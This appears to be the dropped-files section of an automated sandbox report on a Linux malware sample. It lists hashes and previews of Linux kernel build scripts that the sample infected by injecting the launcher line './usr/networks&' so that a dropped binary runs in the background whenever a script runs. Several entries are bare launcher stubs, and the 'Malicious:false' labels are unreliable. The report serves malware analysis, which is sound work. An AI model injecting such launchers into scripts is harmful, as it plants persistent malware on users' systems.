                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):465
                                                                  Entropy (8bit):5.4019794559876315
                                                                  Encrypted:false
                                                                  SSDEEP:12:gFtLQSXFtY3HxfA6+XO0AaTB19qAbWO9cxZM+efJg0cK4n:GZQS+3HgXO0B9qEWOyxy+eBZ4
                                                                  MD5:54A6A3D258F9A9B950D60A5626825ADF
                                                                  SHA1:448FB38EBEEE3831DE36A834B79EF934294DDC8D
                                                                  SHA-256:821246C38A09A3923E111723BC97F9CD9283C8C35E3D1DFB0E72903332F34D61
                                                                  SHA-512:A8AFA3E3508CB1FEEB3A57FD3B8985B8BCC2EE97F51DD617B86CB7FED8F1B23B084AD78B73A8CF78AF0A9F069FF4EAD3873AB4080218E30809225BCCDF013112
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi..cat <<EOF |.asm-generic/atomic-instrumented.h.asm-generic/atomic-long.h.linux/atomic-fallback.h.EOF.while read header; do..OLDSUM="$(tail -n 1 ${LINUXDIR}/include/${header})"..OLDSUM="${OLDSUM#// }"...NEWSUM="$(sed '$d' ${LINUXDIR}/include/${header} | sha1sum)"..NEWSUM="${NEWSUM%% *}"...if [ "${OLDSUM}" != "${NEWSUM}" ]; then...printf "warning: generated include/${header} has been modified.\n"..fi.done..exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4968
                                                                  Entropy (8bit):4.920227358499317
                                                                  Encrypted:false
                                                                  SSDEEP:96:Ym4VbZrlkq6N3KQjSDWtrdXHBI6AvIqU7PErnNLHbzObH6ImH4jK:/4/96N3KPWxdXHS6AQqUornN/zObaIm5
                                                                  MD5:85C37C9E403C29B8FFE899A13685EEDC
                                                                  SHA1:7AE6BC4CEA347DA3003FDBAF5C1543DB23A84C7A
                                                                  SHA-256:CAFC81A70AA3FA31E0CBA515F2D1A0C699A5AAE403EE7C93B4DF0D1383ED7E14
                                                                  SHA-512:A3E711D9049B1FD332B89CC2441D5A5C92BB5A60D7FD9938394C10EDA110A82D3F6E2F547F195A85CC4F8C2A56F91447255C8DF355EE5A2EE0691D5E468D604D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.file ${obj} | grep -q ELF || (echo "${obj} is not and ELF file." 1>&2 ; exit 0)..# Bail out early if there isn't an __ex_table section in this object file..objdump -hj __ex_table ${obj} 2> /dev/null > /dev/null.[ $? -ne 0 ] && exit 0..white_list=.text,.fixup..suspicious_relocs=$(objdump -rj __ex_table ${obj} | tail -n +6 |....grep -v $(eval echo -e{${white_list}}) | awk '{print $3}')..# No suspicious relocs in __ex_table, jobs a good'un.[ -z "${suspicious_relocs}" ] && exit 0...# After this point, something is seriously wrong since we just found out we.# have some relocations in __ex_table which point to sections which aren't.# white listed. If you're adding a new section in the Linux kernel, and.# you're expecting this section to contain code which can fault (i.e. the.# __ex_table relocation to your new section is expected), simply add your.# new section to the white_list variable above. If not, you're probably.# doing something wrong and the rest of this code is ju
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):302
                                                                  Entropy (8bit):5.219576879921936
                                                                  Encrypted:false
                                                                  SSDEEP:6:w6vp1jFhdSmORXjFhdSm7BvRubdSmxkA+JEe04n:w6vp18mOx8mFJuYmWASpn
                                                                  MD5:85210DF121FAA7D7C5A43F6B8E9CC1DE
                                                                  SHA1:B6650F883605434AD1508FF4C63383318459DD29
                                                                  SHA-256:1CE728C499D7489A6CE69F8A5217E94B4A331F385D30C7C093F1371A371FFFB2
                                                                  SHA-512:D9F06696FB3C5C26ECFE5EDA962F395DD45CCF9A28BCDE93C434D9EE252D2A6F1FAA5149F3F215799E1CFEBA34403903B15EB85E12148ADA92806BCA8756F236
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..MAJOR=$(echo __clang_major__ | $compiler -E -x c - | tail -n 1).MINOR=$(echo __clang_minor__ | $compiler -E -x c - | tail -n 1).PATCHLEVEL=$(echo __clang_patchlevel__ | $compiler -E -x c - | tail -n 1).printf "%d%02d%02d\\n" $MAJOR $MINOR $PATCHLEVEL../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3896
                                                                  Entropy (8bit):5.121242131865798
                                                                  Encrypted:false
                                                                  SSDEEP:96:cIRQQNQY1AsTe3MK6LU+9Tj2bDkBWkEf2MNi9ruP:JMKe3MxUsIkEkEf2MsBuP
                                                                  MD5:B1A3F65748EBE631AA1C34B049B6441B
                                                                  SHA1:27A5DC31170046E466607370AE53C4A17B5EEB66
                                                                  SHA-256:769F3EF12B3B1D92794755947A8ED18899D9F809BD21C913F1F2636BB69DCE21
                                                                  SHA-512:9B7F140B766B700E9729BA6C7DD1A89AFA6D007541AB86479B902959FB7432733A6C01AE282B55AE7328431A6B661E93CC05A1EECD9875E82D1CDB1B143706BB
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..vmlinux=$1.basepath=$2.modpath=$3.declare -A cache.declare -A modcache..parse_symbol() {..# The structure of symbol at this point is:..# ([name]+[offset]/[total length])..#..# For example:..# do_basic_setup+0x9c/0xbf...if [[ $module == "" ]] ; then...local objfile=$vmlinux..elif [[ "${modcache[$module]+isset}" == "isset" ]]; then...local objfile=${modcache[$module]}..else...[[ $modpath == "" ]] && return...local objfile=$(find "$modpath" -name "${module//_/[-_]}.ko*" -print -quit)...[[ $objfile == "" ]] && return...modcache[$module]=$objfile..fi...# Remove the englobing parenthesis..symbol=${symbol#\(}..symbol=${symbol%\)}...# Strip segment..local segment..if [[ $symbol == *:* ]] ; then...segment=${symbol%%:*}:...symbol=${symbol#*:}..fi...# Strip the symbol name so that we could look it up..local name=${symbol%+*}...# Use 'nm vmlinux' to figure out the base address of said symbol...# It's actually faster to call it every time than to load it..# all into
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1309
                                                                  Entropy (8bit):5.41400347412325
                                                                  Encrypted:false
                                                                  SSDEEP:24:eZN4I8lR3Ei3FA3XqT0Lup4tYvrTJRv1RDh9Md+AOH+M4OYvF:ouR3NFiXgEuStYvrTJRv1RvM0iHOYvF
                                                                  MD5:7C9807BE857EBD80586127DFBD72DD09
                                                                  SHA1:6137B06329B80E3584A33969FF39D1CF4ACD66EC
                                                                  SHA-256:2432B269E2B8D3F7A99107C4A7E0E91CDDF26FE75AD5D1421E9F208990BB2ABA
                                                                  SHA-512:10260C00EDF44FBF9CE496EE0D42C8D241835AC2A79D9D867209E1138DC643521CD6BBE4A19D27EEA0468C4057C28B82FB50707552F700FCF06418951135A7D6
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi.DEPMOD=$1.KERNELRELEASE=$2..if ! test -r System.map ; then..echo "Warning: modules_install: missing 'System.map' file. Skipping depmod." >&2..exit 0.fi..# legacy behavior: "depmod" in /sbin, no /sbin in PATH.PATH="$PATH:/sbin".if [ -z $(command -v $DEPMOD) ]; then..echo "Warning: 'make modules_install' requires $DEPMOD. Please install it." >&2..echo "This is probably in the kmod package." >&2..exit 0.fi..# older versions of depmod require the version string to start with three.# numbers, so we cheat with a symlink here.depmod_hack_needed=true.tmp_dir=$(mktemp -d ${TMPDIR:-/tmp}/depmod.XXXXXX).mkdir -p "$tmp_dir/lib/modules/$KERNELRELEASE".if "$DEPMOD" -b "$tmp_dir" $KERNELRELEASE 2>/dev/null; then..if test -e "$tmp_dir/lib/modules/$KERNELRELEASE/modules.dep" -o \...-e "$tmp_dir/lib/modules/$KERNELRELEASE/modules.dep.bin"; then...depmod_hack_needed=false..fi.fi.rm -rf "$tmp_dir".if $depmod_hack_needed; then..symlink="$INSTALL_MOD_PATH/lib/modules/99.98.$KERNEL
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):839
                                                                  Entropy (8bit):5.230182269131585
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6vXjLYbl6v99FwjPF6vC2OlFeSj/PnBqBAACqn9q2eLAItfnJ2WDFUejDcAANUH:rXjMy99FwiCplBPhR243RnJ2WZv+D4
                                                                  MD5:6578F62E5AA90B2455866F70CB00DB8C
                                                                  SHA1:5D58A9B336173EF29C843F14B6ADF65C347B3849
                                                                  SHA-256:4FFCDD44FEDE7CB9CFBCC8017ABCD9D557B8DC5289D0F518C12B65A590D4CD0C
                                                                  SHA-512:61868A56A6993B4ECF3D4AEA9F00CE175C1E2A27EF8ADBF598B14288D63F143A2CEAC9CF7F55F4D19A52EBCF9332C2F5E6CA7CF4147BDA1A500B99A7A163D20A
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..if [ "$#" -ne 1 ]; then..echo "Usage: scripts/find-unused-docs.sh directory"..exit 1.fi..if ! [ -d "$1" ]; then..echo "Directory $1 doesn't exist"..exit 1.fi..cd "$( dirname "${BASH_SOURCE[0]}" )".cd ....cd Documentation/..echo "The following files contain kerneldoc comments for exported functions \.that are not used in the formatted documentation"..# FILES INCLUDED..files_included=($(grep -rHR ".. kernel-doc" --include \*.rst | cut -d " " -f 3))..declare -A FILES_INCLUDED..for each in "${files_included[@]}"; do..FILES_INCLUDED[$each]="$each"..done..cd ....# FILES NOT INCLUDED..for file in `find $1 -name '*.c'`; do...if [[ ${FILES_INCLUDED[$file]+_} ]]; then..continue;..fi..str=$(scripts/kernel-doc -export "$file" 2>/dev/null)..if [[ -n "$str" ]]; then..echo "$file"..fi..done.../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:C++ source, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):602
                                                                  Entropy (8bit):5.17249933912423
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6vlg/1EkrFQsGvUogu3vInLRSKkqbhIAyNATWCGv7gTn:rlStrF1G90AKTbKr8Ui
                                                                  MD5:A87F8C76BA6B3031F82AB489E4AD42CA
                                                                  SHA1:DA856F308DA044257648AF722CDE0BA94AEB8487
                                                                  SHA-256:9BB298DE45E1FF2396B33933013251732C2119725A0EA1D18D7605CF6B2334E6
                                                                  SHA-512:05310DB15A63F5CD8B105E578FDA2B85EEBB5375DE3B798B31A2C5F8D4F79967A74AEA00294B8397A26081B5F2DFDF53AA339702B26346434C19F74D427B35A2
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..case "$plugincc" in..*"$1 CC"*)...echo "$1"...exit 0...;;...*"$2 CXX"*)...# the c++ compiler needs another test, see below...;;...*)...exit 1...;;.esac..# we need a c++ compiler that supports the designated initializer GNU extension.plugincc=$($2 -c -x c++ -std=gnu++98 - -fsyntax-only -I"${srctree}"/gcc-plugins -I"${gccplugins_dir}"/include 2>&1 <<EOF.#include "gcc-common.h".class test {.public:..int test;.} test = {...test = 1.};.EOF.)..if [ $? -eq 0 ].then..echo "$2"..exit 0.fi..if [ -n "$SHOW_ERROR" ] ; then..echo "${plugincc}" >&2.fi.exit 1../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):293
                                                                  Entropy (8bit):5.287996420109818
                                                                  Encrypted:false
                                                                  SSDEEP:6:w6vpCChdSmOCa3dSm7BC+gdSmxkA+JEe04n:w6vpCCWmOCa8mFC+hmWASpn
                                                                  MD5:9D9B956D66E83B77B2B88BD28622C783
                                                                  SHA1:FDDB267DAA99F989CDF8F519172780BE04770D74
                                                                  SHA-256:ED13B418C809B424C5F82283856D0E5996A7C2327B0B6422FEC03C2C3A173F7F
                                                                  SHA-512:079EA467DA6AC66570751D588397424D933B7639B5499B253B68BD0F7090F2AC4A1B279A2212714D4A9E7E11B418D9EEB8CA4BC2E7FDAAE3E260C5CF15CFC25F
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..MAJOR=$(echo __GNUC__ | $compiler -E -x c - | tail -n 1).MINOR=$(echo __GNUC_MINOR__ | $compiler -E -x c - | tail -n 1).PATCHLEVEL=$(echo __GNUC_PATCHLEVEL__ | $compiler -E -x c - | tail -n 1).printf "%d%02d%02d\\n" $MAJOR $MINOR $PATCHLEVEL../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):261
                                                                  Entropy (8bit):4.878194343450546
                                                                  Encrypted:false
                                                                  SSDEEP:6:wWI2VT758W9BFgkU5eAp3045Z4rk/OskN7n:ZIsl8eBtU5fiKZ40un
                                                                  MD5:0F89ECFD3269FA438F54A022D0ED1B9E
                                                                  SHA1:AA8EF09B70C8F11A1A344B12F4F0155EBAC55B7C
                                                                  SHA-256:231A5D5AB8024E6BF42F0D0BCA7F01ABDAD3C4F3828BD21F8CFF3B28183C7214
                                                                  SHA-512:DF0E041A38D0CA6821EE11D136E446535795D561637868D1F6AF8C88949D437D3B4BEA4DAF16A81C4DBCA3E134F361578C3955980460174E9309365BDFB16287
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi..echo.echo "ksymdeps_$1 := \\"..for s in $ksyms.do..echo $s | sed -e 's:^_*: $(wildcard include/ksym/:' \....-e 's:__*:/:g' -e 's/$/.h) \\/'.done..echo.echo "$1: \$(ksymdeps_$1)".echo.echo "\$(ksymdeps_$1):"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3232
                                                                  Entropy (8bit):5.719401961550023
                                                                  Encrypted:false
                                                                  SSDEEP:96:KWhJ8g5+JiYkgwiN+qoTKFuOdvxv5qRc/J/c/34vzq7:Kpg5R0RtVh0f4vO7
                                                                  MD5:5CF848AA3C163E4FD75E563D97B50B36
                                                                  SHA1:24AC6D3CFD1D134C30BADF420AD758510762A30F
                                                                  SHA-256:62A220CB3D964A0B72A1D47D6683CB43FB5DF0F04F511155D60EB0C747F8BD3B
                                                                  SHA-512:E0680D7B83F140B92C64AADC42ECEB15268EBA569CF51EAF695CBAB556289494EC4B162EF0A27BB62402A042C6F1EFB0313FCD2DCE763EED92B55876C94DAE57
                                                                  Malicious:false
